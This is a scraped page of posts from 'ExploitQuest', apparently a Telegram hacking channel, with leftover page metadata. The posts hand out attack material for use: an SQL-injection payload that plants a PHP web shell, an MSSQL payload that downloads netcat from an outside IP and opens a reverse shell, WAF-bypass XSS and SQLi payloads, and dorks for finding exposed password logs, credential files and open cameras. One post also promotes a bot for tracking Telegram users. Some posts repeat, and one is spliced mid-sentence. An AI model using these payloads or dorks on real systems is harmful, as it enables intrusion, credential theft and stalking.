es
Feedback
ExploitQuest

ExploitQuest

Ir al canal en Telegram

contact: @ExploitQuestbot

Mostrar más
El país no está especificadoTecnologías y Aplicaciones14 073
6 808
Suscriptores
Sin datos24 horas
+97 días
+12430 días
Archivo de publicaciones
\\\"@example.com', FILTER_VALIDATE_EMAIL);”\nIt will validate and legally return an email with the attack vector:\n \n\"'-->\"@example.com\n\nAnd how the developers display it further is a separate question.\n\n#sqli","datePublished":"2024-12-29T09:51:20Z","dateModified":"2024-12-29T09:51:20Z","author":{"@type":"Organization","name":"ExploitQuest","url":"https://telemetr.io/es/channels/1941018014-exploitquest","image":"https://img.tlmtr.io/c/27mjsa/5951799859155683023?ty=x"},"publisher":{"@type":"Organization","name":"ExploitQuest","url":"https://telemetr.io/es/channels/1941018014-exploitquest","image":"https://img.tlmtr.io/c/27mjsa/5951799859155683023?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":684},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":5},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":10}]}},{"@type":"ListItem","position":7,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/es/channels/1941018014-exploitquest/posts/109","url":"https://telemetr.io/es/channels/1941018014-exploitquest/posts/109","mainEntityOfPage":"https://telemetr.io/es/channels/1941018014-exploitquest/posts/109","headline":"🔎 A small selection of interesting Google dorks ▫️ FTP servers and sites intitle:“index of” inurl:ftp after:2…","articleBody":"🔎 A small selection of interesting Google dorks\n\n▫️ FTP servers and sites \n\nintitle:“index of” inurl:ftp after:2018\n▫️Log files with passwords: \nallintext:password filetype:log after:2018\n▫️Configuration files with passwords: \nfiletype:env “DB_PASSWORD” after:2018\n▫️Lists with email addresses: \nfiletype:xls inurl:“email.xls”\n▫️Open cameras:\ninurl:top.htm inurl:currenttime\n#web #google","datePublished":"2024-12-28T15:50:56Z","dateModified":"2024-12-28T15:50:56Z","author":{"@type":"Organization","name":"ExploitQuest","url":"https://telemetr.io/es/channels/1941018014-exploitquest","image":"https://img.tlmtr.io/c/27mjsa/5951799859155683023?ty=x"},"publisher":{"@type":"Organization","name":"ExploitQuest","url":"https://telemetr.io/es/channels/1941018014-exploitquest","image":"https://img.tlmtr.io/c/27mjsa/5951799859155683023?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":773},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":7},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":13}]}},{"@type":"ListItem","position":8,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/es/channels/1941018014-exploitquest/posts/108","url":"https://telemetr.io/es/channels/1941018014-exploitquest/posts/108","mainEntityOfPage":"https://telemetr.io/es/channels/1941018014-exploitquest/posts/108","headline":"📨 Getting other vulnerabilities when downloading a file When testing file upload functionality in a web appli…","articleBody":"📨 Getting other vulnerabilities when downloading a file\n\nWhen testing file upload functionality in a web application, try setting the file name to the following values:\n\n▫️ ../../../tmp/lol.png -> for Path Traversal vulnerability\n\n▫️ sleep(10)-- -.jpg -> for SQL injection\n\n▫️ .jpg/png -> for XSS\n\n▫️ ; sleep 10; -> for command injection\n\nThese payloads may introduce additional vulnerabilities.\n\n#web","datePublished":"2024-12-28T13:51:08Z","dateModified":"2024-12-28T13:51:08Z","author":{"@type":"Organization","name":"ExploitQuest","url":"https://telemetr.io/es/channels/1941018014-exploitquest","image":"https://img.tlmtr.io/c/27mjsa/5951799859155683023?ty=x"},"publisher":{"@type":"Organization","name":"ExploitQuest","url":"https://telemetr.io/es/channels/1941018014-exploitquest","image":"https://img.tlmtr.io/c/27mjsa/5951799859155683023?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":757},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":6},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":14}]}},{"@type":"ListItem","position":9,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/es/channels/1941018014-exploitquest/posts/107","url":"https://telemetr.io/es/channels/1941018014-exploitquest/posts/107","mainEntityOfPage":"https://telemetr.io/es/channels/1941018014-exploitquest/posts/107","headline":"💉 Transition from SQL injection to shell or backdoor ▫️Use the “into outfile” command to write to a file: ' u…","articleBody":"💉 Transition from SQL injection to shell or backdoor\n\n▫️Use the “into outfile” command to write to a file:\n\n' union select 1, '' into outfile '/var/www/dvwa/cmd.php' #\n▫️Capture the request in Burp Proxy and save it to the post-request file, then run sqlmap :\n\nsqlmap -r post-request -p item --level=5 --risk=3 --dbms=mysql --os-shell --threads 10\n▫️reverse netcat shell via mssql injection when xp_cmdshell is available:\n\n1000';+exec+master.dbo.xp_cmdshell+'(echo+open+10.11.0.245%26echo+anonymous%26echo+whatever%26echo+binary%26echo+get+nc.exe%26echo+bye)+>+c:\\ftp.txt+%26+ftp+-s:c:\\ftp.txt+%26+nc.exe+10.11.0.245+443+-e+cmd';--\n \n#web #sqli","datePublished":"2024-12-28T13:26:41Z","dateModified":"2024-12-28T13:26:41Z","author":{"@type":"Organization","name":"ExploitQuest","url":"https://telemetr.io/es/channels/1941018014-exploitquest","image":"https://img.tlmtr.io/c/27mjsa/5951799859155683023?ty=x"},"publisher":{"@type":"Organization","name":"ExploitQuest","url":"https://telemetr.io/es/channels/1941018014-exploitquest","image":"https://img.tlmtr.io/c/27mjsa/5951799859155683023?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":751},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":4},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":17}]}},{"@type":"ListItem","position":10,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/es/channels/1941018014-exploitquest/posts/106","url":"https://telemetr.io/es/channels/1941018014-exploitquest/posts/106","mainEntityOfPage":"https://telemetr.io/es/channels/1941018014-exploitquest/posts/106","headline":"gov","articleBody":"gov","datePublished":"2024-12-28T06:18:38Z","dateModified":"2024-12-28T06:18:38Z","author":{"@type":"Organization","name":"ExploitQuest","url":"https://telemetr.io/es/channels/1941018014-exploitquest","image":"https://img.tlmtr.io/c/27mjsa/5951799859155683023?ty=x"},"publisher":{"@type":"Organization","name":"ExploitQuest","url":"https://telemetr.io/es/channels/1941018014-exploitquest","image":"https://img.tlmtr.io/c/27mjsa/5951799859155683023?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":765},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":4},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":7}]}},{"@type":"ListItem","position":11,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/es/channels/1941018014-exploitquest/posts/104","url":"https://telemetr.io/es/channels/1941018014-exploitquest/posts/104","mainEntityOfPage":"https://telemetr.io/es/channels/1941018014-exploitquest/posts/104","headline":"dork: ```intitle:\"index of\" \"back.sql\" OR \"backup.sql\" OR \"accounts.sql\" OR \"backups.sql\" OR \"clients.sql\" OR…","articleBody":"dork: \n\n```intitle:\"index of\" \"back.sql\" OR \"backup.sql\" OR \"accounts.sql\" OR \"backups.sql\" OR \"clients.sql\" OR \"customers.sql\" OR \"data.sql\" OR \"database.sql\" OR \"database.sqlite\" OR \"users.sql\" OR \"db.sql\" OR \"db.sqlite\" OR \"db_backup.sql\" OR \"dbase.sql\" OR \"dbdump.sql\" OR \"setup.sql\" OR \"sqldump.sql\" OR \"dump.sql\" OR \"mysql.sql\" OR \"sql.sql\" OR \"temp.sql\"\n```","datePublished":"2024-12-28T06:16:31Z","dateModified":"2024-12-28T06:16:31Z","author":{"@type":"Organization","name":"ExploitQuest","url":"https://telemetr.io/es/channels/1941018014-exploitquest","image":"https://img.tlmtr.io/c/27mjsa/5951799859155683023?ty=x"},"publisher":{"@type":"Organization","name":"ExploitQuest","url":"https://telemetr.io/es/channels/1941018014-exploitquest","image":"https://img.tlmtr.io/c/27mjsa/5951799859155683023?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":1622},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":3},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":46}]}},{"@type":"ListItem","position":12,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/es/channels/1941018014-exploitquest/posts/103","url":"https://telemetr.io/es/channels/1941018014-exploitquest/posts/103","mainEntityOfPage":"https://telemetr.io/es/channels/1941018014-exploitquest/posts/103","headline":"🗂 Forgotten database dumps Old database dumps can contain all sorts of interesting information - user credent…","articleBody":"🗂 Forgotten database dumps\n\nOld database dumps can contain all sorts of interesting information - user credentials, configuration settings, API secrets and keys, customer data, and more.\n\nHere is a short but effective checklist to quickly check for forgotten database dumps.\n\n\n/back.sql\n/backup.sql\n/accounts.sql\n/backups.sql\n/clients.sql\n/customers.sql\n/data.sql\n/database.sql\n/database.sqlite\n/users.sql\n/db.sql\n/db.sqlite\n/db_backup.sql\n/dbase.sql\n/dbdump.sql\n/setup.sql\n/sqldump.sql\n/dump.sql\n/mysql.sql\n/sql.sql\n/temp.sql","datePublished":"2024-12-28T06:12:10Z","dateModified":"2024-12-28T06:12:10Z","author":{"@type":"Organization","name":"ExploitQuest","url":"https://telemetr.io/es/channels/1941018014-exploitquest","image":"https://img.tlmtr.io/c/27mjsa/5951799859155683023?ty=x"},"publisher":{"@type":"Organization","name":"ExploitQuest","url":"https://telemetr.io/es/channels/1941018014-exploitquest","image":"https://img.tlmtr.io/c/27mjsa/5951799859155683023?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":753},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":4},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":10}]}},{"@type":"ListItem","position":13,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/es/channels/1941018014-exploitquest/posts/102","url":"https://telemetr.io/es/channels/1941018014-exploitquest/posts/102","mainEntityOfPage":"https://telemetr.io/es/channels/1941018014-exploitquest/posts/102","headline":"You can use httpx to request any path and see the status code and length and other details on the go, filter,…","articleBody":"You can use httpx to request any path and see the status code and length and other details on the go, filter, or matcher flags if you want to be more specific. \n\nhttpx -path /swagger-api/ -status-code -content-length","datePublished":"2024-12-27T20:30:22Z","dateModified":"2024-12-27T20:30:22Z","author":{"@type":"Organization","name":"ExploitQuest","url":"https://telemetr.io/es/channels/1941018014-exploitquest","image":"https://img.tlmtr.io/c/27mjsa/5951799859155683023?ty=x"},"publisher":{"@type":"Organization","name":"ExploitQuest","url":"https://telemetr.io/es/channels/1941018014-exploitquest","image":"https://img.tlmtr.io/c/27mjsa/5951799859155683023?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":730},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":8},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":12}]}},{"@type":"ListItem","position":14,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/es/channels/1941018014-exploitquest/posts/101","url":"https://telemetr.io/es/channels/1941018014-exploitquest/posts/101","mainEntityOfPage":"https://telemetr.io/es/channels/1941018014-exploitquest/posts/101","headline":"​​💉 About bypassing protection against SQL injections Often, the WAF on the site stifles all attempts to perf…","articleBody":"​​💉 About bypassing protection against SQL injections\n\nOften, the WAF on the site stifles all attempts to perform SQL injection and does not allow it's okay to insert a quotation mark and insert the usual payload, however, with some clever manipulations it is still often possible to bypass it.\n\nFor example, by adding control characters like %00 , %0A , etc. or by inserting mathematical operations \n\n( 'AND'1'=1*1 instead of 'AND'1'='1' ) \n\nor by adding specific comments like\n\n /*!50000%55nIoN*/ /*!50000%53eLeCt*/\n \n\nand much more.\n\nFor more examples, you can check out this repository, which shows bypass options for different situations, and I highly recommend this site.\n\n#web #sqli #bypass #waf","datePublished":"2024-12-27T14:27:02Z","dateModified":"2024-12-27T14:27:02Z","author":{"@type":"Organization","name":"ExploitQuest","url":"https://telemetr.io/es/channels/1941018014-exploitquest","image":"https://img.tlmtr.io/c/27mjsa/5951799859155683023?ty=x"},"publisher":{"@type":"Organization","name":"ExploitQuest","url":"https://telemetr.io/es/channels/1941018014-exploitquest","image":"https://img.tlmtr.io/c/27mjsa/5951799859155683023?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":783},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":6},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":14}]}},{"@type":"ListItem","position":15,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/es/channels/1941018014-exploitquest/posts/100","url":"https://telemetr.io/es/channels/1941018014-exploitquest/posts/100","mainEntityOfPage":"https://telemetr.io/es/channels/1941018014-exploitquest/posts/100","headline":"​​💉 About bypassing protection against SQL injections Often, the WAF on the site stifles all attempts to perf…","articleBody":"​​💉 About bypassing protection against SQL injections\n\nOften, the WAF on the site stifles all attempts to perform SQL injection and does not allow it's okay to insert a quotation mark and insert the usual payload, however, with some clever manipulations it is still often possible to bypass it.\n\nFor example, by adding control characters like %00​​💉 About bypassing protection against SQL injections\n\nOften, the WAF on the site stifles all attempts to perform SQL injection and does not allow it's okay to insert a quotation mark and insert the usual payload, however, with some clever manipulations it is still often possible to bypass it.\n\nFor example, by adding control characters like %00 , %0A , etc. or by inserting mathematical operations ( 'AND'1'=1*1 instead of 'AND'1'='1' ) or by adding specific comments like /*!50000%55nIoN*/ /*!50000%53eLeCt*/ and much more.\n\nFor more examples, you can check out this repository, which shows bypass options for different situations, and I highly recommend this site.\n\n#web #sqli #bypass #waf,%0A , etc. or by inserting mathematical operations\n\n( 'AND'1'=1*1 instead of \n'AND'1'='1' )\n\n\nor by adding specific comments like\n\n/*!50000%55nIoN*/ /*!50000%53eLeCt*/\n\nand much more.\n\nFor more examples, you can check out this repository, which shows bypass options for different situations, and I highly recommend this site.\n\n#web #sqli #bypass #waf","datePublished":"2024-12-27T14:23:59Z","dateModified":"2024-12-27T14:25:50Z","author":{"@type":"Organization","name":"ExploitQuest","url":"https://telemetr.io/es/channels/1941018014-exploitquest","image":"https://img.tlmtr.io/c/27mjsa/5951799859155683023?ty=x"},"publisher":{"@type":"Organization","name":"ExploitQuest","url":"https://telemetr.io/es/channels/1941018014-exploitquest","image":"https://img.tlmtr.io/c/27mjsa/5951799859155683023?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":1}]}},{"@type":"ListItem","position":16,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/es/channels/1941018014-exploitquest/posts/99","url":"https://telemetr.io/es/channels/1941018014-exploitquest/posts/99","mainEntityOfPage":"https://telemetr.io/es/channels/1941018014-exploitquest/posts/99","headline":"ExploitQuest","datePublished":"2024-12-27T14:23:54Z","dateModified":"2024-12-27T14:23:54Z","author":{"@type":"Organization","name":"ExploitQuest","url":"https://telemetr.io/es/channels/1941018014-exploitquest","image":"https://img.tlmtr.io/c/27mjsa/5951799859155683023?ty=x"},"publisher":{"@type":"Organization","name":"ExploitQuest","url":"https://telemetr.io/es/channels/1941018014-exploitquest","image":"https://img.tlmtr.io/c/27mjsa/5951799859155683023?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":719},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":6}]}},{"@type":"ListItem","position":17,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/es/channels/1941018014-exploitquest/posts/98","url":"https://telemetr.io/es/channels/1941018014-exploitquest/posts/98","mainEntityOfPage":"https://telemetr.io/es/channels/1941018014-exploitquest/posts/98","headline":"ادخلوا القناة دي بتنشر محتوى رايق https://t.me/wa3i_tech https://t.me/wa3i_tech https://t.me/wa3i_tech","articleBody":"ادخلوا القناة دي بتنشر محتوى رايق\nhttps://t.me/wa3i_tech\nhttps://t.me/wa3i_tech\nhttps://t.me/wa3i_tech","datePublished":"2024-12-26T20:53:27Z","dateModified":"2024-12-26T20:53:27Z","author":{"@type":"Organization","name":"ExploitQuest","url":"https://telemetr.io/es/channels/1941018014-exploitquest","image":"https://img.tlmtr.io/c/27mjsa/5951799859155683023?ty=x"},"publisher":{"@type":"Organization","name":"ExploitQuest","url":"https://telemetr.io/es/channels/1941018014-exploitquest","image":"https://img.tlmtr.io/c/27mjsa/5951799859155683023?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":781},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":3}]}},{"@type":"ListItem","position":18,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/es/channels/1941018014-exploitquest/posts/97","url":"https://telemetr.io/es/channels/1941018014-exploitquest/posts/97","mainEntityOfPage":"https://telemetr.io/es/channels/1941018014-exploitquest/posts/97","headline":"جاري الترجمة شاركو القناة تقديرا للمجهود ⏳","articleBody":"جاري الترجمة شاركو القناة تقديرا للمجهود ⏳","datePublished":"2024-12-24T18:08:08Z","dateModified":"2024-12-26T19:18:16Z","author":{"@type":"Organization","name":"ExploitQuest","url":"https://telemetr.io/es/channels/1941018014-exploitquest","image":"https://img.tlmtr.io/c/27mjsa/5951799859155683023?ty=x"},"publisher":{"@type":"Organization","name":"ExploitQuest","url":"https://telemetr.io/es/channels/1941018014-exploitquest","image":"https://img.tlmtr.io/c/27mjsa/5951799859155683023?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":159},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":1}],"sharedContent":{"@type":"SocialMediaPosting","datePublished":"2024-12-24T17:47:21Z"}}},{"@type":"ListItem","position":19,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/es/channels/1941018014-exploitquest/posts/96","url":"https://telemetr.io/es/channels/1941018014-exploitquest/posts/96","mainEntityOfPage":"https://telemetr.io/es/channels/1941018014-exploitquest/posts/96","headline":"اتمنى منكم الدعم الراجل و تقدروا تعبو","articleBody":"اتمنى منكم الدعم الراجل و تقدروا تعبو","datePublished":"2024-12-24T18:08:08Z","dateModified":"2024-12-26T19:18:16Z","author":{"@type":"Organization","name":"ExploitQuest","url":"https://telemetr.io/es/channels/1941018014-exploitquest","image":"https://img.tlmtr.io/c/27mjsa/5951799859155683023?ty=x"},"publisher":{"@type":"Organization","name":"ExploitQuest","url":"https://telemetr.io/es/channels/1941018014-exploitquest","image":"https://img.tlmtr.io/c/27mjsa/5951799859155683023?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":170}]}},{"@type":"ListItem","position":20,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/es/channels/1941018014-exploitquest/posts/95","url":"https://telemetr.io/es/channels/1941018014-exploitquest/posts/95","mainEntityOfPage":"https://telemetr.io/es/channels/1941018014-exploitquest/posts/95","headline":"@K00X90bot بوت ممتاز جدا في جمع المعلومات عن معرف تلي او مجموعة و يعرفك الشخص الي انت حاطط معرفه فين بيروح و…","articleBody":"@K00X90bot\n\nبوت ممتاز جدا في جمع المعلومات عن معرف تلي او مجموعة و يعرفك الشخص الي انت حاطط معرفه فين بيروح و فين بيمشي","datePublished":"2024-12-24T02:55:07Z","dateModified":"2024-12-26T19:18:16Z","author":{"@type":"Organization","name":"ExploitQuest","url":"https://telemetr.io/es/channels/1941018014-exploitquest","image":"https://img.tlmtr.io/c/27mjsa/5951799859155683023?ty=x"},"publisher":{"@type":"Organization","name":"ExploitQuest","url":"https://telemetr.io/es/channels/1941018014-exploitquest","image":"https://img.tlmtr.io/c/27mjsa/5951799859155683023?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":32}]}}]}
⛓ Search for SSRF on a site with one command To accomplish this task, we will use several utilities. Findomain collects the d
⛓ Search for SSRF on a site with one command To accomplish this task, we will use several utilities. Findomain collects the domains of the site being tested. Httpx checks their availability. Getallurls (gau) extracts known URLs from the AlienVault Open Threat Exchange, Wayback Machine, and Common Crawl. Qsreplace takes URLs as input and replaces all query string values ​​with the value specified by the user. After installing the above tools, simply run the following command:
findomain -t DOMAIN -q | httpx -silent -threads 1000 | gau | grep "=" | qsreplace your.burpcollaborator.net
Replace your.burpcollaborator.net with your server (or Burp Collaborator ) address #web #ssrf

💉 Find SQL injection on the site with one command As always, a set of commands is used for these purposes. Findomain collect
💉 Find SQL injection on the site with one command As always, a set of commands is used for these purposes. Findomain collects the domains of the site being tested. Httpx checks their availability. Waybackurls retrieves all URLs that the Wayback Machine knows about identified live subdomains. Anew will merge Findomain and Waybackurls output and remove duplicates. Now we'll use gf to filter out URLs that match patterns with potential SQL injection (don't forget to install gf-patterns as well). Finally, let's run sqlmap on all identified potentially vulnerable URLs.
findomain -t testphp.vulnweb.com -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent
#web #sqli

Hacking with an image. PHP payload in an image. The php-jpeg-injector tool can be used to attack web applications that run a
Hacking with an image. PHP payload in an image. The php-jpeg-injector tool can be used to attack web applications that run a .jpeg image through the PHP GD graphics library. The tool creates a new .jpeg file with a PHP payload. The infected .jpeg file is executed via PHP's gd library. PHP interprets the payload injected into the jpeg and executes it. #web GitHub Link

Bypass Cloudflare WAF Payloads working at the time of publication for performing XSS on sites protected by Cloudflare WAF.
<img longdesc="src='x'onerror=alert(document.domain);//><img " src='showme'>
`` <img longdesc="src=" images="" stop.png"="" onerror="alert(document.domain);//"" src="x" alt="showme"> `` #web #xss

Memes about xss are like this 🤡😂.
Memes about xss are like this 🤡😂.

After exploiting sql injection using the following email address "'-sleep(5)-'"@mail.local you can't help but wonder: why the
After exploiting sql injection using the following email address
"'-sleep(5)-'"@mail.local
you can't help but wonder: why the hell did this even get through as a valid email? In general, the local part (login, before @) of an email can contain special characters according to RFC, if it is enclosed in double quotes. And then - already beloved programming languages ​​deviate a little from what characters can be used. So, the next magic:
php -r "echo filter_var('\"\'--><script/src=//evil.com></script>\"@example.com', FILTER_VALIDATE_EMAIL);”
It will validate and legally return an email with the attack vector:
"'--><script/src=//evil.com></script>"@example.com
And how the developers display it further is a separate question. #sqli

🔎 A small selection of interesting Google dorks ▫️ FTP servers and sites intitle:“index of” inurl:ftp after:2018 ▫️Log files
🔎 A small selection of interesting Google dorks ▫️ FTP servers and sites
intitle:“index of” inurl:ftp after:2018
▫️Log files with passwords:
allintext:password filetype:log after:2018
▫️Configuration files with passwords:
filetype:env “DB_PASSWORD” after:2018
▫️Lists with email addresses:
filetype:xls inurl:“email.xls”
▫️Open cameras:
inurl:top.htm inurl:currenttime
#web #google

📨 Getting other vulnerabilities when downloading a file When testing file upload functionality in a web application, try setting the file name to the following values:
▫️ ../../../tmp/lol.png -> for Path Traversal vulnerability
▫️ sleep(10)-- -.jpg -> for SQL injection
▫️ <svg onload=alert(document.domain)>.jpg/png -> for XSS
▫️ ; sleep 10; -> for command injection
These payloads may introduce additional vulnerabilities. #web

💉 Transition from SQL injection to shell or backdoor ▫️Use the “into outfile” command to write to a file: ' union select 1,
💉 Transition from SQL injection to shell or backdoor ▫️Use the “into outfile” command to write to a file:
' union select 1, '<?php system($_GET["cmd"]); ?>' into outfile '/var/www/dvwa/cmd.php' #
▫️Capture the request in Burp Proxy and save it to the post-request file, then run sqlmap :
sqlmap -r post-request -p item --level=5 --risk=3 --dbms=mysql --os-shell --threads 10
▫️reverse netcat shell via mssql injection when xp_cmdshell is available:
1000';+exec+master.dbo.xp_cmdshell+'(echo+open+10.11.0.245%26echo+anonymous%26echo+whatever%26echo+binary%26echo+get+nc.exe%26echo+bye)+>+c:\ftp.txt+%26+ftp+-s:c:\ftp.txt+%26+nc.exe+10.11.0.245+443+-e+cmd';--
#web #sqli

gov
gov

dork: ```intitle:"index of" "back.sql" OR "backup.sql" OR "accounts.sql" OR "backups.sql" OR "clients.sql" OR "customers.sql"
+1
dork: ```intitle:"index of" "back.sql" OR "backup.sql" OR "accounts.sql" OR "backups.sql" OR "clients.sql" OR "customers.sql" OR "data.sql" OR "database.sql" OR "database.sqlite" OR "users.sql" OR "db.sql" OR "db.sqlite" OR "db_backup.sql" OR "dbase.sql" OR "dbdump.sql" OR "setup.sql" OR "sqldump.sql" OR "dump.sql" OR "mysql.sql" OR "sql.sql" OR "temp.sql" ```

🗂 Forgotten database dumps Old database dumps can contain all sorts of interesting information - user credentials, configuration settings, API secrets and keys, customer data, and more. Here is a short but effective checklist to quickly check for forgotten database dumps.
/back.sql /backup.sql /accounts.sql /backups.sql /clients.sql /customers.sql /data.sql /database.sql /database.sqlite /users.sql /db.sql /db.sqlite /db_backup.sql /dbase.sql /dbdump.sql /setup.sql /sqldump.sql /dump.sql /mysql.sql /sql.sql /temp.sql

You can use httpx to request any path and see the status code and length and other details on the go, filter, or matcher flag
You can use httpx to request any path and see the status code and length and other details on the go, filter, or matcher flags if you want to be more specific.
httpx -path /swagger-api/ -status-code -content-length

​​💉 About bypassing protection against SQL injections Often, the WAF on the site stifles all attempts to perform SQL injection and does not allow it's okay to insert a quotation mark and insert the usual payload, however, with some clever manipulations it is still often possible to bypass it. For example, by adding control characters like %00 , %0A , etc. or by inserting mathematical operations
( 'AND'1'=1*1 instead of 'AND'1'='1' )
or by adding specific comments like
/*!50000%55nIoN*/ /*!50000%53eLeCt*/
and much more. For more examples, you can check out this repository, which shows bypass options for different situations, and I highly recommend this site.
#web #sqli #bypass #waf

​​💉 About bypassing protection against SQL injections Often, the WAF on the site stifles all attempts to perform SQL injection and does not allow it's okay to insert a quotation mark and insert the usual payload, however, with some clever manipulations it is still often possible to bypass it. For example, by adding control characters like %00​​💉 About bypassing protection against SQL injections Often, the WAF on the site stifles all attempts to perform SQL injection and does not allow it's okay to insert a quotation mark and insert the usual payload, however, with some clever manipulations it is still often possible to bypass it. For example, by adding control characters like %00 , %0A , etc. or by inserting mathematical operations ( 'AND'1'=1*1 instead of 'AND'1'='1' ) or by adding specific comments like /*!50000%55nIoN*/ /*!50000%53eLeCt*/ and much more. For more examples, you can check out this repository, which shows bypass options for different situations, and I highly recommend this site. #web #sqli #bypass #waf,%0A , etc. or by inserting mathematical operations ( 'AND'1'=1*1 instead of 'AND'1'='1' ) or by adding specific comments like /*!50000%55nIoN*/ /*!50000%53eLeCt*/ and much more. For more examples, you can check out this repository, which shows bypass options for different situations, and I highly recommend this site. #web #sqli #bypass #waf

photo content

ادخلوا القناة دي بتنشر محتوى رايق https://t.me/wa3i_tech https://t.me/wa3i_tech https://t.me/wa3i_tech

Repost from Malware Hex
جاري الترجمة شاركو القناة تقديرا للمجهود ⏳
جاري الترجمة شاركو القناة تقديرا للمجهود ⏳

اتمنى منكم الدعم الراجل و تقدروا تعبو

@K00X90bot بوت ممتاز جدا في جمع المعلومات عن معرف تلي او مجموعة و يعرفك الشخص الي انت حاطط معرفه فين بيروح و فين بيمشي